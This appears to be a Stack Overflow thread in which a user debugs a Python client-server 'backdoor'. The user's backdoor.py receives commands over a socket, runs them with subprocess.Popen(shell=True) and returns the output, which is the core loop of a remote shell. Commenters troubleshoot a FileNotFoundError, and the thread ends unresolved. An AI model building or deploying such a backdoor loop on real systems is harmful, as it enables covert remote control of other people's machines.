# Python subprocess error. The system cannot find the file specified

Tags: python, python-3.x, subprocess, file-not-found

I've created simple client-server app. 
File server.py passes the command loaded by the user to the backdoor.py file. When it tries to execute it with the **subprocess** library and **Popen** function It gets the following error:

```
File "D:\Programs\python\backdoor.py", line 24, in shell
    execute = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE) File "C:\Users\Comarch\AppData\Local\Programs\Python\Python310\lib\subprocess.py", line 971, in __init__
    self._execute_child(args, executable, preexec_fn, close_fds,   File "C:\Users\Comarch\AppData\Local\Programs\Python\Python310\lib\subprocess.py", line 1440, in _execute_child
    hp, ht, pid, tid = _winapi.CreateProcess(executable, args, FileNotFoundError: [WinError 2] The system cannot find the file specified
```

This is the part of the code that is responsible for reading and executing the command:

```py
def reliable_recv():
    data = ''
    while True:
        try:
            data = data + s.recv(1024).decode().rstrip()
            return json.loads(data)
        
        except ValueError:
            continue

def shell():
    while True:
        command = reliable_recv()
        if command == 'quit':
            break
        execute = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
        
        result = execute.stdout.read() + execute.stderr.read()
        result = result.decode()
        reliable_send(result)
```

Comment: `Popen` tries to run the command in sort of a shell (kind of). You could look at it like _"it types the 'command' for you"_ (sort of, kind of). Now: What your code will try to do is take whatever is returned by `reliable_recv` and try to "paste" that in a terminal (specially with `shell=True`). By looking at your code, it's more like... taking a dictionary/list and trying to use that as a command to run in a terminal. That looks... odd. Do you have a sample of what `data` looks like? In any case, the error itself indicates that the program it's trying to run is not present in the computer.

Comment: If *reliable_recv()* returns anything, it will be a dictionary because that's what *json.loads()* does. Try *print(command)* immediately before *subprocess.Popen()*. It almost certainly isn't what you expected

Comment: @OldBill I've tried to `print(type(command))` in shell() and it returns str..

Comment: @BorrajaX `data` are simple terminal commands such as whoami etc.

Comment: @Kfiatek430 Why don't you print what I suggested and show the output. Then explain how json.loads() can return a str type

Comment: @OldBill
I've added in shell() just before subprocess.Popen(): 
`print(command)` and `print(type(command))`

and I've typed in server.py "whoami". Before the error I recived:
`whoami`
`<class 'str'>`

I don't know how.

Comment: @OldBill, Technically, the Python's json parser _could_ return a string (`json.loads("\"foo\"")`) But, same as you, I still find it suspicious, though. @Kfiatek430... Has this code worked for _any_ command? I mean... If you send something like `"dir"` (found in pretty much any windows, as your server seems to be running on) . I'm thinking either 1) The output of `reliable_recv` is not quite a string, 2) It's trying to run a command that doesn't exist in the server.

Comment: @BorrajaX Agreed. So in Python terms *reliable_rcv()* has *data == '"whoami"'* hence *json.loads()* returns a string. So that raises two questions: 1) Why is json.loads() being used at all? 2) Does Windows have a whoami command by default? (I wouldn't know as Windows is the devil's own operating system)

Comment: @OldBill @BorrajaX Even if I return `data` instead of `json.loads(data)` or I try to create string from dict with `json.dumps(command)` I still get the same error. 

This code didn't work for any command.